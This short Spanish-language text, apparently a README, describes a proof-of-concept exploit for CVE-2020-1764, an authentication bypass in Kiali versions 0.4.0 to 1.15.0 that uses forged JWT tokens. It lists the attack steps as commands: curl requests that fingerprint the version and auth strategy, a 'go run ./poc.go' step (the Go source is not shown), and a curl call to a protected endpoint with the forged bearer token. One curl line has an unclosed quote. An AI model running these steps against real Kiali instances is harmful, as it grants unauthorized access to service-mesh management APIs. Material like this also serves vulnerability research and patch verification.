
Exploit de prueba de concepto para CVE-2020-1764, omisión de autenticación en Kiali 0.4.0–1.15.0, que permite acceso no autorizado a la API mediante tokens JWT manipulados.
PoC de omisión de autenticación para Kiali 0.4.0 a 1.15.0 usando la estrategia de autenticación de inicio de sesión (Boletín de seguridad)
comprobar versión: curl 'http://<IP>/api
comprobar estrategia de autenticación: curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"